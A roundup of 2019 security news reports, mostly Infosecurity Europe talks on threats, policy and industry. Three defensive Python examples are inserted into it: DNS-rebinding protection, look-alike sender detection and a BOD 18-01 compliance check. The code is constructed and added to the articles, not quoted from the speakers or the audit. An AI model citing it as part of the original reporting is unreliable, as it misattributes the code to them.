He said the “UK Government’s cyber strategy and NIS Directive is playing a key role in helping improve cybersecurity in UK CNI organizations” but added that the rapid emergence of new vulnerabilities and malicious actors’ smarter tactics make it “impossible to completely secure CNI networks and systems.” A focus on reducing detection and response times is therefore crucial, Habibi-Parker explained, and that’s where the MITRE ATT&CK Framework can be very effective.

That’s because MITRE ATT&CK “uses real world intelligence on the TTPs used by APT groups.” It’s a great way to validate and improve your detection, incident handling and continuous monitoring capabilities, Habibi-Parker said.

However, Habibi-Parker was quick to point out that MITRE ATT&CK is not “a replacement for cybersecurity best practices” nor is it a list of fully-achievable objectives. It may also not be the right choice for an organization that does not have a SOC, he added, and “implementing monitoring of endpoints and behavioral analytics is critical to success.”

#Infosec19: Passwords Are Here to Stay, Warns Troy Hunt

Five years from today there will be more passwords in use than at present – despite their inherent security failings – according to HaveIBeenPwned founder Troy Hunt.

Presenting the Infosecurity Hall of Fame Annual Lecture on the last day of Infosecurity Europe today, Hunt sought to dispel some common misconceptions about cybersecurity.

HaveIBeenPwned started as a “fun project” back in 2013 and the free site now has over 7.8bn compromised accounts listed, which users can check to see if they have been breached.

Unfortunately, passwords are here to stay despite the emergence of solutions like multi-factor authentication which are far more secure, Hunt warned.

“They may be good technical solutions … but every single person in this room knows how to use a password, as bad as it is security wise,” he argued.

This usability will always trump security concerns, but organizations can and should make log-ins more robust by enhancing passwords with password managers and U2F keys, he added.

The dark web is often blamed for providing a platform for cyber-criminals to trade such credentials online, but the surface web is also a major offender, Hunt claimed.

He showed a screenshot of a single Twitter account which posted MEGA links to the notorious “Collection” combo lists, publicly exposing billions of unique emails and passwords, for example.

That’s not all: YouTube is awash with “hundreds” of how-to videos, detailing the simple steps budding cyber-criminals can take to launch SQLi attacks, credential stuffing and more, Hunt claimed.

Some of those he played on stage appeared to be voiced by teens, highlighting another misconception about cybercrime: that it tends to be the work of hardened, organized gangs.

One former law enforcer was quoted following the TalkTalk attack as suggesting it was the work of “Russian Islamic cyber jihadis,” for example. In reality, the breach, which cost the telco £77m, was mainly down to a 17-year-old boy.

“The damage [kids] can do is massive. So many children have access to this [hacking] information that anyone can use it without knowing the problems it can cause,” he argued. “We’ve got to do more to set kids back on the right path.”

The National Crime Agency’s Cyber Choices campaign highlights the scale of the problem, and the need to raise awareness among parents of what their kids may be up to.

#Infosec19: “We Can Build Safe 5G Networks Irrespective of Supplier” – NCSC

Governments and industry need to “focus on fixes, not fear,” and work out how to build safer 5G networks rather than obsessing about national security concerns leveled at suppliers, according to the National Cyber Security Centre (NCSC).

NCSC boss, Ciaran Martin, told attendees on day three of Infosecurity Europe this morning that the next generation of network infrastructure can be architected in a way that mitigates risks posed by vendors.

Referring to a tabloid headline which claimed Huawei could theoretically turn off all the household appliances in UK smart homes if allowed to build 5G, he argued: “We don’t have to build 5G networks that way and I’d argue we shouldn’t.”

Martin added: “We have to get 5G network security right, and that is a much bigger issue than the national identity of suppliers.

“It would be a real shame if we allowed fear back into cybersecurity. People need to understand the risks, and we, as experts, need to understand and explain how network security can be [implemented] to give a satisfactory level of assurance.”

The UK government has worked hard over the past few years to move from a fear-based approach to cybersecurity to a pragmatic one, he claimed.

Part of the journey towards a more mature approach to cybersecurity means promoting pragmatic ways to tackle threats rather than glamorizing attacks.

“Cybersecurity is not something we should be scared of and not something we should scare people about,” argued Martin. “The first step is to understand that and the diversity of it and [not promote] cybersecurity as a big technical ball of risk that non-technical people can’t understand.”

To help in this, the NCSC has produced a “five questions for boards” document, so that business leaders are better equipped to discuss issues in-depth with CISOs.

“You don’t all have to be cyber experts, but you need to know how to talk to cyber experts,” Martin added.

Quick wins could be had from focusing on improving baseline security, he added, claiming that the notorious state-sponsored Cloudhopper attackers managed to infect some victims using a 19-year-old virus because they were running outdated systems and flat networks.

Martin concluded on a note of optimism, claiming that, unlike the start of the digital revolution 20 years ago, industry experts can see a lot of what’s coming down the road. By working “seriously, dispassionately and transparently,” progress can be made to eradicate structural vulnerabilities, he argued.

#Infosec19: DNS Rebinding Attacks Could Hit Billions of IoT Devices

DNS rebinding attacks are a real threat that could hit the billions of internet of things (IoT) devices in people’s homes, according to Craig Young, principal security researcher at Tripwire.

Young was speaking in the Geek Street Theatre on day three of the Infosecurity Conference at London’s Kensington Olympia.

During the session, Young explained the impact of the threat – which turns a victim’s browser into a proxy for attacking private networks – within IoT. “Over the years, I have found countless vulnerabilities in IoT products,” he said.

This is partly because IoT often uses HTTP, which is vulnerable to DNS rebinding. In the future, the consequences could be significant: Rebinding also opens new doors for botnets, according to Young.

“The problem is, defenders seem to discount this as a real threat, but in the future, someone might want to create a botnet and there will be more hosts to target,” he said.

During his research, Young found devices including the Google Home smart speaker were vulnerable to DNS rebinding attacks. “I was able to ask the Google Home to give me IP addresses of nearby access points so I could tell where devices were,” he explained.

Another class of devices vulnerable to DNS rebinding are IoT units using standards-based web services access protocol SOAP. “You can use this to steal data, disable devices and brick them,” he said.

Young said vulnerable IoT devices included the Belkin Wemo smart outlet and the Sonos connected speaker – the latter of which allowed him to play false content and rename or reset the device.

In order to prevent DNS rebinding attacks, Young advises mitigation at the DNS layer, segmenting networks, using the NoScript extension for Firefox or “various adblockers.”

At the same time, Young said: “Devices and everything else should be using HTTPS – which is not affected by DNS rebinding. All apps need authentication: Even if it’s a home network, it should have some kind of credential mechanism.”
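The two defensive layers Young names (mitigation at the DNS layer and per-device hardening) can both be expressed as small checks. The following is an added example, not code from Young, Tripwire or any vendor: a resolver-side filter that refuses to let a public name resolve to an internal address (the idea behind dnsmasq's rebind protection), and a device-side Host header check that a home-network device's web UI can apply to every request. The trusted local zones, the device address and hostname, and the sample queries are all constructed.

```python
"""Defensive checks against DNS rebinding (added example, not Tripwire code)."""
import ipaddress
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Iterable, List, Optional


def is_internal_address(ip: str) -> bool:
    """True for addresses a public hostname has no business resolving to:
    RFC 1918 and other private ranges, loopback, link-local and unspecified."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback
            or addr.is_link_local or addr.is_unspecified)


def filter_rebinding_answers(qname: str, answers: Iterable[str],
                             trusted_zones: Iterable[str] = ("lan.", "home.arpa.")) -> List[str]:
    """Resolver-side rebind protection.

    Drops A/AAAA answers that map a public name onto an internal address.
    Names under a trusted local zone (constructed default list) may still
    resolve internally, otherwise the home LAN itself would stop working.
    """
    name = qname.lower().rstrip(".") + "."
    for zone in trusted_zones:
        zone = zone.lower().rstrip(".") + "."
        if name == zone or name.endswith("." + zone):
            return list(answers)
    return [a for a in answers if not is_internal_address(a)]


def host_header_allowed(host_header: Optional[str], device_addresses: Iterable[str],
                        device_names: Iterable[str] = ()) -> bool:
    """Device-side check.

    After a rebind the victim's browser reaches this device but still sends
    the attacker's hostname in Host, so a device that only answers when Host
    names one of its own addresses or hostnames cannot be driven that way.
    Ports are ignored; IPv6 literals must be bracketed as RFC 7230 requires.
    """
    if not host_header:
        return False
    host = host_header.strip().lower()
    if host.startswith("["):
        end = host.find("]")
        if end < 0:
            return False
        name, rest = host[1:end], host[end + 1:]
        if rest and not rest.startswith(":"):
            return False
    else:
        name, _, port = host.partition(":")
        if ":" in port:              # bare IPv6 literal is not a valid Host value
            return False
    try:
        name = str(ipaddress.ip_address(name))   # canonical form, e.g. FE80::1 -> fe80::1
    except ValueError:
        name = name.rstrip(".")
    allowed = {str(ipaddress.ip_address(a)) for a in device_addresses}
    allowed |= {n.lower().rstrip(".") for n in device_names}
    return name in allowed


class DeviceHandler(BaseHTTPRequestHandler):
    """Minimal device web UI that rejects rebound requests with 421."""
    device_addresses = ("192.168.1.20",)   # constructed sample LAN address
    device_names = ("speaker.lan",)        # constructed sample LAN name

    def do_GET(self):
        if not host_header_allowed(self.headers.get("Host"),
                                   self.device_addresses, self.device_names):
            self.send_error(421, "Misdirected Request")
            return
        body = b"device status: ok\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), DeviceHandler).serve_forever()
```

The Host header check is what makes plain HTTP survivable on a LAN device; it does not replace the HTTPS and authentication Young asks for, since a rebound origin still cannot present a certificate for the device's real name, and credentials stop a request that does get through from doing anything.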

#Infosec19 Dark Web Sales Offer Network Access for $10,000

Access to FTSE 100 and Fortune 500 corporate networks has increased on the dark web.

According to research by Bromium and the University of Surrey, presented at Infosecurity Europe, four in ten dark net vendors are selling targeted hacking services aimed at FTSE 100 and Fortune 500 businesses, while there has been a 20% rise in the number of dark net listings in the last three years, specifically “with a direct potential to harm the enterprise.”

The most heavily targeted industries were identified as banking (34%), ecommerce (20%), healthcare (15%), and education (12%). Threats tailored to specific industries or organizations outnumber off-the-shelf varieties by a ratio of 2:1.

“Almost every vendor offered us tailored versions of malware as a way of targeting specific companies or industries,” said Dr. Mike McGuire, Senior Lecturer in Criminology at the University of Surrey. “The more targeted the attack, the higher the cost, with prices rising even further when it involved high-value targets like banks. The most expensive piece of malware found was designed to target ATMs and retailed for approximately $1,500.”

Access to corporate networks is sold openly; 60% of vendors approached by researchers offered access to more than ten business networks each and 70% of dark net vendors engaged invited researchers to talk on encrypted messaging applications, like Telegram, to take conversations beyond the reach of law enforcement.

Speaking to Infosecurity, Bromium president and co-founder Ian Pratt said that dark web “stores” are often just a “shop window” to sell services, and most transactions usually take place over encrypted communication channels like Signal and Telegram.

“The dark web is not an index, but a bunch of sites separate from the regular web,” Pratt said. He also said that access to networks is commonly sold for around $10,000, but it is not too hard to determine what a company uses. “Also it is not even zero-days, it is bypassing detection-based systems,” he said.

Pratt also said that many cyber-criminals now have separate supply chains providing language services and tailored malware for an attack. One example is the Emotet banking Trojan, which is often used as the dropper for the initial infection; command-and-control access is then sold on, the payload scrapes credentials, and the Trojan is re-used for cryptojacking.

Aside from access to financial services and e-commerce, healthcare information was targeted by 15% of actors. Pratt explained that commonly, the information is held for ransom and if the ransom is not paid, the details are released.

“The methods for providing access varied considerably,” Dr. McGuire explained. “Some involved stolen remote access credentials that are for sale for as little as $2, others involve backdoor access or the use of malware. Illicit remote access tools appear to be most popular – we were offered Remote Access Trojans at least five times more often than keyloggers.

“Enterprises, researchers, and law enforcement must continue to study the dark net to get a deeper understanding of the adversaries that we are dealing with, and better prepare ourselves for counteracting the effects of a growing cybercrime economy.”

Tennessee Valley Authority Isn’t Compliant with Federal Directives

The Tennessee Valley Authority (TVA) inspector general has reported that 115 TVA registered domains were found not meeting the Department of Homeland Security (DHS) standards for cybersecurity during an audit earlier this year. A memo published by the TVA Inspector General's Office on May 29, 2019, reported that internal auditors also found that encryption requirements were inadequate on 20 TVA websites. 

The review was part of an annual audit plan to ensure that the TVA was compliant with two federal directives that require website and email security controls. These controls had to comply with the Office of Management and Budget’s (OMB) memorandum M-15-13, Policy to Require Secure Connections across Federal Websites and Web Services, and DHS's binding operational directive (BOD) 18-01, Enhance Email and Web Security, regarding website and email security practices.

According to David Wheeler, the assistant inspector general for audits and evaluations, the TVA was found not to be compliant with OMB M-15-13 and DHS BOD 18-01. "In addition, we found that TVA's web site inventory was incomplete." These findings were formally communicated to TVA management on March 26, 2019.

The fieldwork for the audit was carried out from November 2018 to March 2019. The team obtained and reviewed TVA's website inventory from the TVA's cybersecurity personnel and compared it to the population of identified publicly accessible websites, according to the memo from Wheeler. Internet domain listings were also collected. These domains and websites were then scanned using tools to determine compliance with OMB M-15-13 and DHS BOD 18-01 requirements. Out of 116 domains, 115 did not meet requirements, with encryption requirements inadequate on 20 out of 55 TVA websites.

This left TVA emails and websites open to attacks, such as phishing. Research by IRONSCALES found that secure email gateways (SEG) failed to stop 99.5% of all nontrivial email spoofing attacks. A two-year analysis of more than 100,000 verified email spoofing attacks found that the most common spoofing techniques included sender name impersonations and domain look-alike attacks, which bypass SEG technology on a regular basis.
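The two spoofing techniques the IRONSCALES findings single out, display-name impersonation and look-alike domains, are both things a defender can screen for on the From: header before a message reaches a user. The following is an added example and not IRONSCALES' or any gateway's logic: the protected domain, the list of names worth impersonating, the confusable-character table and the sample headers are all constructed, and the edit-distance threshold of 2 is an assumed tuning value.

```python
"""Flag display-name impersonation and look-alike sender domains
(added example, constructed data)."""
import unicodedata
from email.utils import parseaddr
from typing import Dict, List

# Constructed: the organization's own domain and the people most worth impersonating.
PROTECTED_DOMAIN = "acme-power.example"
PROTECTED_NAMES = {"alex morgan", "sam lee"}

# Characters and pairs commonly swapped in because they look alike in many fonts.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "|": "l", "rn": "m", "vv": "w"}


def normalize_domain(domain: str) -> str:
    """Lowercase, strip accents via NFKD, then collapse confusable characters."""
    d = unicodedata.normalize("NFKD", domain.lower())
    d = "".join(c for c in d if not unicodedata.combining(c))
    for src, dst in CONFUSABLES.items():
        d = d.replace(src, dst)
    return d


PROTECTED_NORM = normalize_domain(PROTECTED_DOMAIN)


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; domains are short, so the O(n*m) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_sender(from_header: str, max_distance: int = 2) -> List[str]:
    """Return finding tags for one From: header value; empty means nothing seen."""
    display, address = parseaddr(from_header)
    domain = address.rpartition("@")[2].lower().rstrip(".")
    findings: List[str] = []
    if domain == PROTECTED_DOMAIN:
        return findings        # own domain: SPF/DKIM/DMARC decide, not this check
    if display.strip().lower() in PROTECTED_NAMES:
        findings.append("DISPLAY-NAME-IMPERSONATION")
    norm = normalize_domain(domain)
    if norm == PROTECTED_NORM:
        findings.append("LOOKALIKE-DOMAIN:confusable")
    elif levenshtein(norm, PROTECTED_NORM) <= max_distance:
        findings.append("LOOKALIKE-DOMAIN:edit-distance")
    return findings


SAMPLE_FROM_HEADERS = [   # constructed sample headers, not real mail
    "Alex Morgan <alex.morgan@acme-power.example>",
    "Alex Morgan <alex.morgan.ceo@webmail.example>",
    "Accounts Payable <ap@acrne-power.example>",
    "Sam Lee <sam.lee@acme-p0wer.example>",
    "Newsletter <news@vendor.example>",
]


def scan(headers=SAMPLE_FROM_HEADERS) -> Dict[str, List[str]]:
    """Map each flagged header to its findings."""
    return {h: classify_sender(h) for h in headers if classify_sender(h)}


if __name__ == "__main__":
    for header, tags in scan().items():
        print(f"{header}: {', '.join(tags)}")
```

The display-name check is deliberately limited to mail from outside the protected domain; messages that claim the organization's own domain are the job of SPF, DKIM and DMARC, which is exactly what the audit above found missing. The confusable table is illustrative and does not cover Cyrillic or other non-Latin homoglyphs.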

In his memo, Wheeler recommended that email security policies for domains needed to be updated to meet requirements, reviewing them on a periodic basis for compliance. He also wrote: "Update websites that were not compliant with OMB M-15-13 and DHS BOD-18-01 requirements, and review on a periodic basis for compliance" as well as review website inventory.
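The audit's method, collect the domain inventory and scan each entry against the directives' requirements, is straightforward to reproduce once the observations are in hand. The following is an added example, not the TVA OIG's or DHS's tooling: it evaluates a set of per-domain observations against the controls BOD 18-01 and M-15-13 name (SPF and DMARC records, HTTPS with HSTS, and no SSLv2/SSLv3, RC4 or 3DES). The observations would normally come from DNS lookups and TLS scans; here they are constructed inline so the check runs offline. The one-year HSTS max-age floor, the SPF fail-qualifier check and the DMARC reporting-address check are assumptions layered on top of the directives' text, chosen to match common scanner practice.

```python
"""Evaluate per-domain observations against the OMB M-15-13 / DHS BOD 18-01
web and e-mail controls (added example with constructed data)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

ONE_YEAR = 31536000                                 # HSTS max-age floor (assumption)
WEAK_PROTOCOLS = {"SSLv2", "SSLv3"}                 # BOD 18-01: disable
WEAK_CIPHER_MARKERS = ("RC4", "3DES", "DES-CBC3")   # BOD 18-01: disable RC4 and 3DES


@dataclass
class DomainObservation:
    domain: str
    spf_txt: Optional[str]          # TXT at the domain apex, if any
    dmarc_txt: Optional[str]        # TXT at _dmarc.<domain>, if any
    https_ok: bool                  # HTTPS served with a valid certificate chain
    http_redirects_to_https: bool   # plain HTTP redirects to HTTPS
    hsts_header: Optional[str]      # Strict-Transport-Security value, if any
    tls_protocols: Tuple[str, ...]  # protocol versions the server accepted
    ciphers: Tuple[str, ...]        # cipher suites the server accepted


def parse_tags(record: str) -> dict:
    """Split a 'k=v; k=v' style record (DMARC) into a dict of lowercase keys."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags


def evaluate(obs: DomainObservation) -> List[str]:
    """Return a list of finding codes; an empty list means compliant."""
    findings: List[str] = []

    # E-mail controls: SPF with a fail qualifier, DMARC at p=reject with reporting.
    if not obs.spf_txt or not obs.spf_txt.lower().startswith("v=spf1"):
        findings.append("SPF-MISSING")
    elif not re.search(r"[-~]all\s*$", obs.spf_txt.lower()):
        findings.append("SPF-NO-FAIL-QUALIFIER")

    if not obs.dmarc_txt or not obs.dmarc_txt.upper().startswith("V=DMARC1"):
        findings.append("DMARC-MISSING")
    else:
        tags = parse_tags(obs.dmarc_txt)
        if tags.get("p", "").lower() != "reject":
            findings.append("DMARC-POLICY-NOT-REJECT")
        if "rua" not in tags:
            findings.append("DMARC-NO-AGGREGATE-REPORTING")

    # Web controls: HTTPS-only with HSTS, no obsolete protocols or ciphers.
    if not obs.https_ok:
        findings.append("HTTPS-NOT-SERVED")
    elif not obs.http_redirects_to_https:
        findings.append("HTTP-NOT-REDIRECTED")
    if obs.hsts_header is None:
        findings.append("HSTS-MISSING")
    else:
        m = re.search(r"max-age\s*=\s*(\d+)", obs.hsts_header, re.I)
        if not m or int(m.group(1)) < ONE_YEAR:
            findings.append("HSTS-MAXAGE-SHORT")
    for proto in obs.tls_protocols:
        if proto in WEAK_PROTOCOLS:
            findings.append(f"WEAK-PROTOCOL:{proto}")
    for cipher in obs.ciphers:
        if any(marker in cipher.upper() for marker in WEAK_CIPHER_MARKERS):
            findings.append(f"WEAK-CIPHER:{cipher}")
    return findings


SAMPLE_INVENTORY = [   # constructed inventory, not TVA's
    DomainObservation("good.example", "v=spf1 include:_spf.good.example -all",
                      "v=DMARC1; p=reject; rua=mailto:dmarc@good.example",
                      True, True, "max-age=31536000; includeSubDomains; preload",
                      ("TLSv1.2", "TLSv1.3"), ("ECDHE-RSA-AES128-GCM-SHA256",)),
    DomainObservation("legacy.example", "v=spf1 include:_spf.legacy.example ?all",
                      "v=DMARC1; p=none", True, False, "max-age=86400",
                      ("SSLv3", "TLSv1.2"), ("RC4-SHA", "ECDHE-RSA-AES128-GCM-SHA256")),
    DomainObservation("parked.example", None, None, False, False, None, (), ()),
]


def noncompliant_domains(inventory=SAMPLE_INVENTORY) -> List[str]:
    """Domains with at least one finding, the figure an audit memo reports."""
    return [o.domain for o in inventory if evaluate(o)]


if __name__ == "__main__":
    for obs in SAMPLE_INVENTORY:
        print(obs.domain, evaluate(obs) or "compliant")
```

Feeding this from a real inventory also exercises Wheeler's other finding: a domain that is not in the inventory is never scanned, so the check is only as good as the list of domains it is given.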

TVA management agreed with the audit findings and recommendations in this report, according to the memo. 

UK Hasn’t Made Sufficient Progress in National Security Strategy

The Public Accounts Committee has found that the UK government has not made sufficient progress on developing long-term objectives for the National Security Strategy.

According to the announcement made today, a weak evidence base and a lack of a business case for the National Cyber Security Programme made it difficult for the Cabinet Office to assess whether it will meet all its objectives by 2021.

The National Cyber Security Centre (NCSC) has dealt with over 1,100 cybersecurity incidents since it was established in October 2016. Committee chair Meg Hillier says that the UK will need to protect itself against risks created by more and more services going online, but there is concern that consumers do not know how well they are protected: "We welcome the National Cyber Security Strategy but are concerned that the program designed to deliver it is insufficient," she explained.

"As it currently stands, the strategy is not supported by the robust evidence the department needs to make informed decisions and accurately measure progress. On top of this, neither the strategy nor the program were grounded in business cases – despite being allocated £1.9bn funding.

"Looking longer term, we are disappointed that the department was not able to give us a clear idea of what the strategy will deliver by 2021. This does not represent a resilient security strategy."

Since 2011, the Cabinet Office has managed two five-year national cybersecurity strategies. According to the report, it is beginning to make progress in meeting the strategic outcomes of the current one, the 2016–2021 National Cyber Security Strategy, after a poor start.

But the report has also found that as well as a weak evidence base, it is also unclear whether the money allocated at the start of the program was the right amount, making it more difficult to judge value for money. 

A third (£169m) of the program’s planned funding for the first two years was either transferred or loaned to support other government national security priorities, such as counterterrorism activities, according to the Public Accounts Committee. Some £69m of this funding will not be returned to the program, which seems at odds with the government’s claim that cybersecurity is a priority.

The recommendations made include the Cabinet Office ensuring that another long-term, coordinated approach to cybersecurity is put in place before the current one finishes in March 2021. Further, it has suggested that a business case should be produced.

The Committee has asked the Cabinet Office to write to it by November 2019, setting out what progress it is making in using evidence-based decisions to prioritize cybersecurity work. This includes plans for undertaking a robust "lessons learned" exercise.

It is also expected that the Cabinet Office will publish its costed plan for the strategy in autumn 2019. 

SentinelOne Secures $120 Million Series D Funding

SentinelOne has raised $120 million in Series D funding, bringing its total funding to over $230 million. 

According to the press release, the funding will be used to accelerate the company's "rapid displacement of legacy and next-gen competitors" in endpoint, cloud and internet of things (IoT) protection. It is led by Insight Partners, with participation from Samsung Venture Investment Corp., NextEquity and previous investors, including Third Point Ventures, Redpoint Ventures, Granite Hill and Data Collective (DCVC), among others. 

The company's patented behavioral artificial intelligence (AI) provides real-time prevention and ActiveEDR at the edge and in the cloud. It does this through a cloud-native platform with no reliance on connectivity or updates.

“We’ve built a team and technology to disrupt and broaden the endpoint space: as the network perimeter is drastically changing, so does the notion of the endpoint,” said Tomer Weingarten, CEO and co-founder of SentinelOne. “Endpoints are everywhere today, from classic laptops and desktops to workloads in the cloud and the data center and all IoT devices – the network edge is the real perimeter. 

"We were the first to unify EPP [endpoint protection platform] and EDR [endpoint detection and response] – prevention, detection, response and hunting – in a single autonomous agent; we were the first to stand behind our product with a cyber warranty; now we are the first to take AI-based device protection to the edge, covering IoT endpoints and workloads in the cloud."

SentinelOne said in its press release that it is the fastest growing endpoint security company on the market, achieving 217% year-over-year (YoY) growth in annual recurring revenue and 140% YoY growth in Fortune 500 bookings. Teddie Wardi, managing director at Insight Partners, said that endpoint security is at a "fascinating point of maturity...Attack methods grow more advanced by the day and customers demand innovative, autonomous technology to stay one step ahead." 

"We recognize SentinelOne’s strong leadership team and vision to be unique in the market," he continued, "as evidenced through the company’s explosive growth and highly differentiated business model from its peer cybersecurity companies.”

“As an investor, SentinelOne’s combination of best-in-class EPP and EDR functionality is a magnet for engagement, but it’s the company’s ability to foresee the future of the endpoint market that attracted us as a technology partner,” said a representative from Samsung. “Extending tech stacks beyond EPP and EDR to include IoT is the clear next step, and we look forward to collaborating with SentinelOne on its groundbreaking work in this area.”

#Infosec19: Identify and Protect your Very Attacked People

Identify and protect your “very attacked people” (VAP) as attackers look for high value targets.

Speaking at Infosecurity Europe in London, Paul Down, senior director of Proofpoint, said that when attackers look to get information or money, a year ago they would run a mass email campaign using automated bots. This year they do not: instead of emailing “info@” addresses, campaigns are now better researched and targeted.

Down said that VAPs are typically “high value executives” such as the CEO, who do not have high levels of account privilege but do have access to financial information. Meanwhile, a “high access user” has sign-off on accounts and information, and is therefore a target for an attacker after money or information.

The top 20 email addresses for a VAP are typically led by a PR manager, as they are very public and listed on every website. “They go for PR@, or accounts@, or sales@ as they have a wide distribution list, and we typically see a 40% click rate on threats delivered to untrained people, so why not do mass email to info@ as many will see it,” he said.

Down said that the CEO is “a lot less targeted” but is more likely to be sent a business email compromise email or a banking Trojan. “The attackers are not looking to compromise the endpoint or perimeter, but target a person,” he said.

Pointing to Proofpoint's State of the Phish research, Down said that 30-40% of respondents knew what phishing is, and that people aged 22-37 (millennials) are more likely to click.

Research also showed that people in commercial positions (19%) are more likely to fail at detecting a phishing email, followed by purchasing (14%), communication (13%) and sales (13%).

Down concluded by saying that a focus on “people-centric risk reduction” will enable you to determine your organization's level of risk and to identify your VAPs and other high-risk people.

“Think on changing behavior and risks,” he said, explaining that simulated phishing exercises can be sourced for free, and that if a user fails one, the reply should be an exercise stating “you shouldn’t click that, it was a simulated phish, we will send you some training now,” because they will not remember the email the following week.

“Once an employee is phished and trained, they become the last line of defense and the best format to report phishes that do come through.”

#Infosec19: Complex Legacy IT Problems Can’t Be Solved with Simple Solutions

“Complex problems cannot be solved with simple solutions.” These were the words of Bobby Ford, VP & Global CISO at Unilever, speaking at Infosecurity Europe 2019.

Ford said that the complex challenge of the security risks posed by legacy systems exists in all industries.

He added that a big part of the problem is that we cannot simply decommission legacy IT systems because they support “some critical business processes, and because of that, we can’t just get rid of them.”

“Our systems are ageing and our ability to replace them is slowing down. As these systems age, the threat increases for them. We can’t update the systems fast enough to stay in front of the threat.”

If you look back at some of the biggest recent cyber-attacks, Ford continued, you will see that legacy systems were at the heart of most of them.

“It’s a complex problem and it’s not going away anytime soon,” he said. “These legacy IT systems equate to business risk, and it’s important that we understand that when we are talking about patching we are talking about business risk. Business risk isn’t a system going down; business risk is an inability to ship a product, business risk is saying ‘I can’t manufacture goods,’ business risk is being unable to invoice a customer.”

So when we talk about dealing with the risk of legacy IT systems, it’s important we do so in business risk language, Ford said, and solving the problem comes down to having “engaging conversations with our business partners to understand our most critical business systems.

“We can’t define what’s most critical, only the business can define what’s most critical.”

To conclude, Ford explained that the key to succeeding with dealing with the risks surrounding legacy systems is prioritization. “I’ve said this my entire career; if we are going to be successful as professional security risk managers, we have to be able to prioritize. We cannot do everything and we can’t secure all systems. We have to work with the business to identify the most critical systems, and then try to secure them.”

#Infosec19: Former Lloyd’s CEO Says Collaboration is Key to Future of Cyber Insurance

Insurers must collaborate more closely with each other and technology firms to improve their understanding of cyber risk and better serve their customers, the former CEO of Lloyd’s of London has argued.

Speaking at Infosecurity Europe today, Inga Beale, explained that cybersecurity-related risk is one of the biggest rising risks facing global businesses, but also the one they arguably know least about.

“We’re trying as a sector to start collaborating together, with governments and with technology pioneers to gather data on all the incidents out there … to understand the scenarios in order to get pricing right,” she explained. “Insurance can be a wonderful way to mitigate risk.”

Lloyd’s is leading the way on this front, by hiring cybersecurity experts of its own to analyze anonymized data to uncover insights. It now accounts for around a quarter of global cyber insurance sold today, Beale claimed.

The data itself needs to cover a broad sweep of areas, not just technical information but also things like staff training, which is a “big factor” insurers take into account when drawing up premiums, she continued.

More generally, Beale bemoaned a persistent communications challenge between CISOs and board members. Although boardroom complacency about the cyber threat has largely disappeared, “most of the time we don’t understand what’s being said,” she argued.

This can lead to board members asking the wrong questions because they “don’t want to appear dumb” and security leaders answering questions that haven’t been asked, Beale added.

“We need a feeling of trust and safety that it’s genuinely OK to have a conversation about what the board members don’t understand and what the experts think are the biggest risks,” she said. “Because board members hate it if risk isn’t under control.”

A tactic employed by Lloyd’s to tackle this challenge is to have one or two tech experts on the board, although diversity in terms of members’ backgrounds is also important, Beale argued. Similarly, CISOs should help by dropping the technical talk and engaging on a personal level.

“Just having a list of metrics or dashboards is probably not the most helpful to a board,” she added.

“It’s curiosity, conversations and exploring everything, and never being happy with the status quo [that’s most important]. You need the intervention of the human mind.”

#Infosec19: Security Must Support Digital Transformation & Enable the Business

At Infosecurity Europe 2019 Ewa Pilat, global CISO at Jaguar Land Rover, explored how the security function can and must support and enable the business through a process of digital transformation.

Pilat explained that digital transformation can mean different things to different organizations, but that as security professionals, “we need to understand it properly in order to provide support in digital transformation.”

Pilat added that the key to doing that is learning lessons from existing examples, pointing to the “older brother” of traditional IT. “Traditional IT, as we know, exists in many different organizations. We must make sure we provide security in a simple way, without complex policies – we should provide innovation because this is something that we can motivate businesses with.”

She said the industry should not work in silos and should not treat security as a separate part of the business. Referring to collaboration, she added: “We must put more effort into educating our business so as to make our colleagues feel more responsible for security and to involve them in the security topics we are covering.”

To conclude, Pilat highlighted six key pieces of advice for security functions looking to support their organization through a process of digital transformation. These were:

  • Recognize scale and complexity
  • Ensure top management support
  • Embed security in the creation of ideas
  • Educate and make the business understand security implications
  • Demonstrate the value added to the business
  • Do not allow creation of shadow security

#Infosec19: Smart Home Ads Could Threaten Democracy

The emergence of the smart home is set to usher in a new era of highly targeted, personalized political advertising which could undermine faith in democracy if left unchecked, a leading commentator has warned.

Speaking on the second day of Infosecurity Europe this morning, bestselling author Jamie Bartlett argued that many key challenges facing society stem from the incompatibility of established “rules, regulations, systems, norms and behaviors” with digital progress.

“Whether it’s Russian bots, untraceable cryptocurrency or election manipulation, many of the problems are due to the fact the old rules don’t work anymore,” he said.

The Cambridge Analytica scandal offers a glimpse into the future of elections, where small groups of swing voters are profiled and micro-targeted by personalized ads. In this way, elections will increasingly be fought in private, removing legitimacy and allowing the losers to question the results, Bartlett warned.

“Elections become an art of data science and subtle nudges … the risk is that people stop trusting in elections,” he added. “I guarantee that had the Clinton side won [the US Presidential election], the Trump team would have said the same thing … ‘you cheated’.”

Unfortunately, the “connections craze” typified by the proliferation of smart home devices will only accelerate the challenges facing election regulators, as devices become part of the “matrix” that works to target individuals with political messaging.

Bartlett claimed data science companies could crunch information generated by smart home devices like fridges, allowing them to more accurately profile users for targeting.

For example, they could predict when a voter usually eats dinner, and therefore is likely to be most hungry/irritable – potentially making them more susceptible to messages from politicians with robust opinions on crime or immigration, he suggested.

“The question becomes how can you effectively run an election people trust when [voters are faced with] dynamic content coming through the smart fridge?” said Bartlett. “The problem is that the [election] regulators can’t monitor what people are sharing, what ads they’re seeing.”

The answer is “not beyond the wit of man,” but will require the creation of “clever software” to publicize all the targeted ads currently viewed privately by individual voters, so they can be analyzed and scrutinized, he concluded.

Bartlett also argued that cybercrime will become increasingly automated in the future as tools like AutoSploit allow hackers to launch indiscriminate attacks against businesses of all sizes.

